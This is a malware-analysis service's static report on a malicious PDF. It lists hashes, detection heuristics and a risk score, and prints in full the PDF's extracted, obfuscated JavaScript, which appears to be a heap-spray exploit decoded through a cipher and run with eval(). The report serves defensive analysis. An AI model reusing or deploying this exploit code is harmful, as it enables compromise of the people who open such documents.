Malicious PDF — malware analysis report

Static analysis result for SHA-256 d8370ecc55510afb…

MALICIOUS

PDF

10.2 KB Created: 2010-09-14 06:40:05 Authoring application: gbC6vhXA8ya45L (via QcMBuouv) First seen: 2026-05-09
MD5: 02704a39b91da7c1a820f82fa1b54df8 SHA-1: 211647fbb01f8cba7159980342207f61f7db098f SHA-256: d8370ecc55510afbc3b5f54343f0c5d300b69c9dbd3d33b965d9b76de6154981
166 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. A high-severity PDF_EVAL heuristic firing suggests the use of eval(), a common technique for obfuscating malicious JavaScript. The embedded JavaScript is likely designed to download and execute a second-stage payload. The file's authoring application and creation date appear to be obfuscated or randomized.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    4O44%(UC4O%(CWUI%(COCM%(zGC4%(s<hP%(sOs<%(MGWC%(hfMG%(shh8%(hzh8%(sOhs%(h4he%(hehW%(sCMz%(Mzh4%(sMhG%(MGhs%(hIh8%(MGhs%(hIh8%(MGhs%(hGhf%(h<h4%(sOMz%(sOhP%(h8WG%(WIh<%(WWW8\"n;\r\nrrw\r\nrrScZSrg2rRzd}q9LmxDbsv,s,cr==rMnt\r\nrrrrF}12p>P4QINsHZ{br=r(iSZAvqSR\"%(<W<W%(<W<W%(<W<W%(OGzU%(WWeU%(hhf8%(POU8%(POO4%(zGWW%(zM<W%(zUGC%(zPOe%(GGzf%(GGGG%(PUsG%(IG<z%(zGzG%(h<zG%(zWCG%(8Gh<%(<MGW%(8Gh<%(hzzs%(zGOW%(zGzU%(h<zG%(U8OW%(h4Ps%(z4C4%(OsOW%(zG44%(zGzG%(CChh%(U8zU%(ssPs%(he44%(Osz4%(zG4G%(zGzG%(CChh% …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0007_000.js pdf-javascript-stream PDF /JS object 7 at offset 0x23D 8309 bytes
SHA-256: 7eda2f389d55770843f86c9926fceeeaa7c9fd61dee37b4ed4d3f6e5f8337aae
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). 102 of 151 identifiers look randomly generated (e.g. 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmn') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
function zcOs0W8on2y0efynyWCi(zcOs0W8on2y0efynyWCi,jjmrU6m11iqUxZKJXzx) {var vPc0kIR2ajBR=zcOs0W8on2y0efynyWCi. substr (jjmrU6m11iqUxZKJXzx, 1);return vPc0kIR2ajBR;}/*f65JuqmWqumaA|gP1AAGd1rl|kCrlUPH*/function lJBMU2X7kCjs(qeWiwQ6w4E2qiK) {/*KQB13XinA|nUe2Lf3S8uAj2kmjM6zT|AjO1cmZF*/var sjjUtk = new String("<>(){} .,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789");/*Xt71mIXfbVPb5I[hsNdh]qhG5YihxoKLXH*//*AQafr|vIr4KOmYsJ4ZrBUFk|AOBFmIInZiIGU4PByZ*/var Dd4BE7kwiQR4z /*ax8ksXRur[UiRjkWLtezI]APX2e*/= new String("k)RntwrayCUfIzG7,VHX jD>bdx6uTF3Y19vNApS2}Eg0JcoiQqm{Zl(.LB5KO4MW<ehsP8");/*q3oHrmra99K|XePoD0BPkfEsjC76|cVlW9sDmaemaoTxJjbN*/for(LwzF1=0;LwzF1<sjjUtk.length;LwzF1++) {if(qeWiwQ6w4E2qiK == zcOs0W8on2y0efynyWCi(Dd4BE7kwiQR4z, LwzF1)) {/*dd98isilqeg[AHe00ic]CEqrYe176*/return zcOs0W8on2y0efynyWCi(sjjUtk, LwzF1);/*XZjXYH <AtwbP5]XZHO8kfBp*/}}return qeWiwQ6w4E2qiK;}/*tDqkBmqY[PvZX1]GnxWjFt8M8*//*xd8dprhVSi7869NsZkjv|NjDwoxv1vsoOqI3Y|OqNMoKM12lcbXJp*/var notJcW8y = new String;var gt7FVpaRSRJ = new String("\r\n.v{rpNfT(H3AJ3YpUW9gr=riSLrC{{v5Rn;\r\n.v{r00Xp<408JBlo.e,m;\r\n2(iAlgQir9uXvimfYDJU9oc, R.A51Ag}D2vONSdxXyr1o.Ep8G4Zx9Sf{4Ent\r\nrrLEgcSrR.A51Ag}D2vONSdxXacSi}lEr*rMrkr1o.Ep8G4Zx9Sf{4Ent\r\nrrrr.A51Ag}D2vONSdxXr+=r.A51Ag}D2vONSdxX;\r\nrrw\r\nrr.A51Ag}D2vONSdxXr=r.A51Ag}D2vONSdxXaZ(NZl{gi}ROyr1o.Ep8G4Zx9Sf{4Er/rMn;\r\nrr{Sl({ir.A51Ag}D2vONSdxX;\r\nw\r\n2(iAlgQirX5Gs}.uj3p5U<bF5Rzd}q9LmxDbsv,s,cnt\r\nrr.v{rG3{o6 OK5PCWY240r=rOBOAOAOAOA;\r\nrr.v{rF}12p>P4QINsHZ{br=r(iSZAvqSR\"%(<W<W%(<W<W%(<W<W%(OGzU%(WWeU%(hhf8%(POU8%(POO4%(zGWW%(zM<W%(zUGC%(zPOe%(GGzf%(GGGG%(PUsG%(IG<z%(zGzG%(h<zG%(zWCG%(8Gh<%(<MGW%(8Gh<%(hzzs%(zGOW%(zGzU%(h<zG%(U8OW%(h4Ps%(z4C4%(OsOW%(zG44%(zGzG%(CChh%(U8zU%(ssPs%(he44%(Osz4%(zG4G%(zGzG%(CChh%(U8zs%(fCPs%(4OeG%(OsMI%(zGOI%(zGzG%(CChh%(U8zW%(OOPs%(OGM4%(OsPG%(zGWU%(zGzG%(CChh%(U8GG%(MzPs%(OC8h%(Oses%(zGM8%(zGzG%(CChh%(CGGU%(IshG%(8CMf%(hh4e%(GsCC%(zPOh%(zGzz%(U4zG%(8Chh%(h<fU%(zUCC%(zzPe%(h<Uh%(GsUC%(OsU8%(zGh<%(zGzG%(PsUG%(GeI8%(8GfO%(sPOs%(zGzG%(hhzG%(GWCC%(MCh<%(MGhf%(hhUG%(fGCC%(4OPs%(zGzG%(UGzG%(CCh<%(PeGU%(UhzI%(UCh<%(OsGs%(zGPz%(zGzG%(CCzf%(MPfG%(UWzG%(f484%(MPPC%(zUCG%(PC8s%(zGzG%(8C4O%(h<fG%(zWCC%(zzPe%(h<Uh%(GsUC%(CGOs%(zGzG%(PezG%(UszP%(CCzf%(IffU%(UfW<%(4OUf%(fG8C%(UfUG%(CCh<%(PeGW%(UhzC%(UCh<%(OsGs%(zGff%(zGzG%(zGPe%(8C4O%(h<fG%(zsCC%(zIPe%(h<Uh%(GsUC%(GGOs%(zGzG%(PezG%(h<4O%(GGCC%(zzPe%(h<Uh%(GsUC%(zGOs%(zGzG%(CzzG%(UIU<%(Ozzf%(Ozzf%(Ozzf%(Ozzf%(OWhf%(UezU%(h<Uf%(OIWe%(UI4P%(OG4O%(h<UC%(h<OW%(zs8M%(UMh<%(U8zW%(8fh<%(h<IW%(G48U%(zf8s%(U84f%(88h<%(zffG%(If4f%(ChMh%(<MCz%(Mfzf%(IfU8%(zO48%(GGe4%(4IIe%(zs8U%(M4Mz%(zfzM%(CG4I%(4zO<%(44I<%(8CU4%(UeOC%(O<h<%(Ueh<%(zffU%(P8WM%(zWh<%(h<C<%(GWUe%(WMzf%(zUh<%(zfh<%(U4MC%(MIUM%(zGzs%(4UOs%(4O44%(UC4O%(CWUI%(COCM%(zGC4%(s<hP%(sOs<%(MGWC%(hfMG%(shh8%(hzh8%(sOhs%(h4he%(hehW%(sCMz%(Mzh4%(sMhG%(MGhs%(hIh8%(MGhs%(hIh8%(MGhs%(hGhf%(h<h4%(sOMz%(sOhP%(h8WG%(WIh<%(WWW8\"n;\r\nrrg2rRzd}q9LmxDbsv,s,cr==r4nt\r\nrrrrG3{o6 OK5PCWY240r=rOBWOWOWOWO;\r\nrrrrF}12p>P4QINsHZ{br=r(iSZAvqSR\"%(<W<W%(<W<W%(<W<W%(OGzU%(WWeU%(hhf8%(POU8%(POO4%(zGWW%(zM<W%(zUGC%(zPOe%(GGzf%(GGGG%(PUsG%(IG<z%(zGzG%(h<zG%(zWCG%(8Gh<%(<MGW%(8Gh<%(hzzs%(zGOW%(zGzU%(h<zG%(U8OW%(h4Ps%(z4C4%(OsOW%(zG44%(zGzG%(CChh%(U8zU%(ssPs%(he44%(Osz4%(zG4G%(zGzG%(CChh%(U8zs%(fCPs%(4OeG%(OsMI%(zGOI%(zGzG%(CChh%(U8zW%(OOPs%(OGM4%(OsPG%(zGWU%(zGzG%(CChh%(U8GG%(MzPs%(OC8h%(Oses%(zGM8%(zGzG%(CChh%(CGGU%(IshG%(8CMf%(hh4e%(GsCC%(zPOh%(zGzz%(U4zG%(8Chh%(h<fU%(zUCC%(zzPe%(h<Uh%(GsUC%(OsU8%(zGh<%(zGzG%(PsUG%(GeI8%(8GfO%(sPOs%(zGzG%(hhzG%(GWCC%(MCh<%(MGhf%(hhUG%(fGCC%(4OPs%(zGzG%(UGzG%(CCh<%(PeGU%(UhzI%(UCh<%(OsGs%(zGPz%(zGzG%(CCzf%(MPfG%(UWzG%(f484%(MPPC%(zUCG%(PC8s%(zGzG%(8C4O%(h<fG%(zWCC%(zzPe%(h<Uh%(GsUC%(CGOs%(zGzG%(PezG%(UszP%(CCzf%(IffU%(UfW<%(4OUf%(fG8C%(UfUG%(CCh<%(PeGW%(UhzC%(UCh<%(OsGs%(zGff%(zGzG%(zGPe%(8C4O%(h<fG%(zsCC%(zIPe%(h<Uh%(GsUC%(GGOs%(zGzG%(PezG%(h<4O%(GGCC%(zzPe%(h<Uh%(GsUC%(zGOs%(zGzG%(CzzG%(UIU<%(Ozzf%(Ozzf%(Ozzf%(Ozzf%(OWhf%(UezU%(h<Uf%(OIWe%(UI4P%(OG4O%(h<UC%(h<OW%(zs8M%(UMh<%(U8zW%(8fh<%(h<IW%(G48U%(zf8s%(U84f%(88h<%(zffG%(If4f%(ChMh%(<MCz%(Mfzf%(IfU8%(zO48%(GGe4%(4IIe%(zs8U%(M4Mz%(zfzM%(CG4I%(4zO<%(44I<%(8CU4%(UeOC%(O<h<%(Ueh<%(zffU%(P8WM%(zWh<%(h<C<%(GWUe%(WMzf%(zUh<%(zfh<%(U4MC%(MIUM%(zGzs%(4UOs%(4O44%(UC4O%(CWUI%(COCM%(zGC4%(s<hP%(sOs<%(MGWC%(hfMG%(shh8%(hzh8%(sOhs%(h4he%(hehW%(sCMz%(Mzh4%(sMhG%(MGhs%(hIh8%(MGhs%(hIh8%(MGhs%(hGhf%(h<h4%(sOMz%(sOhP%(h8WG%(WIh<%(WWW8\"n;\r\nrrw\r\nrrScZSrg2rRzd}q9LmxDbsv,s,cr==rMnt\r\nrrrrF}12p>P4QINsHZ{br=r(iSZAvqSR\"%(<W<W%(<W<W%(<W<W%(OGzU%(WWeU%(hhf8%(POU8%(POO4%(zGWW%(zM<W%(zUGC%(zPOe%(GGzf%(GGGG%(PUsG%(IG<z%(zGzG%(h<zG%(zWCG%(8Gh<%(<MGW%(8Gh<%(hzzs%(zGOW%(zGzU%(h<zG%(U8OW%(h4Ps%(z4C4%(OsOW%(zG44%(zGzG%(CChh%(U8zU%(ssPs%(he44%(Osz4%(zG4G%(zGzG%(CChh%(U8zs%(fCPs%(4OeG%(OsMI%(zGOI%(zGzG%(CChh%(U8zW%(OOPs%(OGM4%(OsPG%(zGWU%(zGzG%(CChh%(U8GG%(MzPs%(OC8h%(Oses%(zGM8%(zGzG%(CChh%(CGGU%(IshG%(8CMf%(hh4e%(GsCC%(zPOh%(zGzz%(U4zG%(8Chh%(h<fU%(zUCC%(zzPe%(h<Uh%(GsUC%(OsU8%(zGh<%(zGzG%(PsUG%(GeI8%(8GfO%(sPOs%(zGzG%(hhzG%(GWCC%(MCh<%(MGhf%(hhUG%(fGCC%(4OPs%(zGzG%(UGzG%(CCh<%(PeGU%(UhzI%(UCh<%(OsGs%(zGPz%(zGzG%(CCzf%(MPfG%(UWzG%(f484%(MPPC%(zUCG%(PC8s%(zGzG%(8C4O%(h<fG%(zWCC%(zzPe%(h<Uh%(GsUC%(CGOs%(zGzG%(PezG%(UszP%(CCzf%(IffU%(UfW<%(4OUf%(fG8C%(UfUG%(CCh<%(PeGW%(UhzC%(UCh<%(OsGs%(zGff%(zGzG%(zGPe%(8C4O%(h<fG%(zsCC%(zIPe%(h<Uh%(GsUC%(GGOs%(zGzG%(PezG%(h<4O%(GGCC%(zzPe%(h<Uh%(GsUC%(zGOs%(zGzG%(CzzG%(UIU<%(Ozzf%(Ozzf%(Ozzf%(Ozzf%(OWhf%(UezU%(h<Uf%(OIWe%(UI4P%(OG4O%(h<UC%(h<OW%(zs8M%(UMh<%(U8zW%(8fh<%(h<IW%(G48U%(zf8s%(U84f%(88h<%(zffG%(If4f%(ChMh%(<MCz%(Mfzf%(IfU8%(zO48%(GGe4%(4IIe%(zs8U%(M4Mz%(zfzM%(CG4I%(4zO<%(44I<%(8CU4%(UeOC%(O<h<%(Ueh<%(zffU%(P8WM%(zWh<%(h<C<%(GWUe%(WMzf%(zUh<%(zfh<%(U4MC%(MIUM%(zGzs%(4UOs%(4O44%(UC4O%(CWUI%(COCM%(zGC4%(s<hP%(sOs<%(MGWC%(hfMG%(shh8%(hzh8%(sOhs%(h4he%(hehW%(sCMz%(Mzh4%(sMhG%(MGhs%(hIh8%(MGhs%(hIh8%(MGhs%(hGhf%(h<h4%(sOMz%(sOhP%(h8WG%(WIh<%(WWW8\"n;\r\nrrw\r\nrr.v{rQ0UZeX{WxMe5EegQr=rOB<OOOOO;\r\nrr.v{rX,u>}vbTQMNP(u3Hr=rF}12p>P4QINsHZ{bacSi}lEr*rM;\r\nrr.v{r1o.Ep8G4Zx9Sf{4Er=rQ0UZeX{WxMe5EegQr-rRX,u>}vbTQMNP(u3Hr+rOBWPn;\r\nrr.v{r.A51Ag}D2vONSdxXr=r(iSZAvqSR\"%(8O8O%(8O8O\"n;\r\nrr.A51Ag}D2vONSdxXr=r9uXvimfYDJU9oc, R.A51Ag}D2vONSdxXyr1o.Ep8G4Zx9Sf{4En;\r\nrr.v{r1gf7WeHTs>uQuUAzr=rRG3{o6 OK5PCWY240r-rOB<OOOOOnr/rQ0UZeX{WxMe5EegQ;\r\nrr2Q{rR.v{rlsp8E<pFeGp5gCV(r=rO;rlsp8E<pFeGp5gCV(rkr1gf7WeHTs>uQuUAz;rlsp8E<pFeGp5gCV(r++rnt\r\nrrrrpNfT(H3AJ3YpUW9g[lsp8E<pFeGp5gCV(]r=r.A51Ag}D2vONSdxXr+rF}12p>P4QINsHZ{b;\r\nrrw\r\nw\r\n2(iAlgQir FU.vFb}llTjePNYRnt\r\nrr.v{rVz2(VHbD1Wj7f2Uhr=rO;\r\nrr.v{r5D4JZdxcH.PD<g(7r=rvqqa.gSLS{FS{ZgQialQ6l{gi}Rn;\r\nrrvqqaAcSv{ugoS>(lR00Xp<408JBlo.e,mn;\r\n\r\nrrg2rR5D4JZdxcH.PD<g(7rkrsa4nt\r\nrrrrX5Gs}.uj3p5U<bF5ROn;\r\nrrrr.v{rbvC7(vp6p40m2..qr=r(iSZAvqSR\"%(OAOA%(OAOA\"n;\r\nrrrrLEgcSrRbvC7(vp6p40m2..qacSi}lErkr<<8eMnbvC7(vp6p40m2..qr+=rbvC7(vp6p40m2..q;\r\nrrrrlEgZraAQccvN6lQ{Sr=rfQccvNaAQccSAlzovgcVi2QRt\r\nrrrrrrZ(N0r:r\"\"yroZ}r:rbvC7(vp6p40m2..q\r\nrrrrw\r\nrrrrn;\r\nrrw\r\ng2rR5D4JZdxcH.PD<g(7r)=r8nt\r\nrrrrl{5rt\r\ng2rRvqqapQAafQccvNa}SlVAQint\r\nrrrrrrrrX5Gs}.uj3p5U<bF5RMn;\r\nrrrrrrrr.v{rA.vC M.SB<W4oB,Jr=r(iSZAvqSR\"%O8\"n;\r\nrrrrrrrrLEgcSrRA.vC M.SB<W4oB,JacSi}lErkrOB<OOOnA.vC M.SB<W4oB,Jr+=rA.vC M.SB<W4oB,J;\r\nrrrrrrrrA.vC M.SB<W4oB,Jr=r\"Da\"r+rA.vC M.SB<W4oB,J;\r\nvqqapQAafQccvNa}SlVAQiRA.vC M.SB<W4oB,Jn;\r\nrrrrrrrrVz2(VHbD1Wj7f2Uhr=r4;\r\nrrrrrrw\r\nrrrrrrScZSrt\r\nrrrrrrrrVz2(VHbD1Wj7f2Uhr=r4;\r\nrrrrrrw\r\nrrrrw\r\nrrrrAvlAErRSnt\r\nrrrrrrVz2(VHbD1Wj7f2Uhr=r4;\r\nrrrrw\r\nrrrrg2rRVz2(VHbD1Wj7f2Uhr==r4nt\r\nrrrrrrg2rRR5D4JZdxcH.PD<g(7r)=rsa4&&r5D4JZdxcH.PD<g(7rkr8nnt\r\nrrrrrrrrX5Gs}.uj3p5U<bF5R4n;\r\nrrrrrrrr.v{rT646<S.}SS3Xv6CZr=r\"4M888888888888888888\";\r\nrrrrrrrr2Q{rRvJW0o5>JWdcQ>W1.r=rO;rvJW0o5>JWdcQ>W1.rkrMsh;rvJW0o5>JWdcQ>W1.r++rnt\r\nrrrrrrrrrrT646<S.}SS3Xv6CZr+=r\"P\";\r\nrrrrrrrrw\r\nrrrrrrrr(lgcaq{gil2R\"%<eOOO2\"yrT646<S.}SS3Xv6CZn;\r\nrrrrrrw\r\nrrrrw\r\nrrw\r\nw\r\nvqqa79>1IHzZ5cf1IjdNr=r FU.vFb}llTjePNY;\r\n00Xp<408JBlo.e,mr=rvqqaZSlugoS>(lR\"vqqa79>1IHzZ5cf1IjdNRn\"yr4On;\r\n");/*Mbl9Mcu5H8mP1A4GqISV{fMKGpmeyR}BsBA5ev0ltc*//*ldwsJ4BeMgrWmX8HLP|M8jN3E8upsNhU|TC0NDVakCwMavTlB*/for(AdoXoyudlAHPtQsGOg=0;AdoXoyudlAHPtQsGOg<gt7FVpaRSRJ.length;AdoXoyudlAHPtQsGOg++)notJcW8y += lJBMU2X7kCjs(zcOs0W8on2y0efynyWCi(gt7FVpaRSRJ,AdoXoyudlAHPtQsGOg));eval(notJcW8y);/*yAbC4fBpLt2sEjBGZP[vpuyc7O]RzQJoQkq*/

Open this report in the interactive analyzer, or submit your own file for analysis.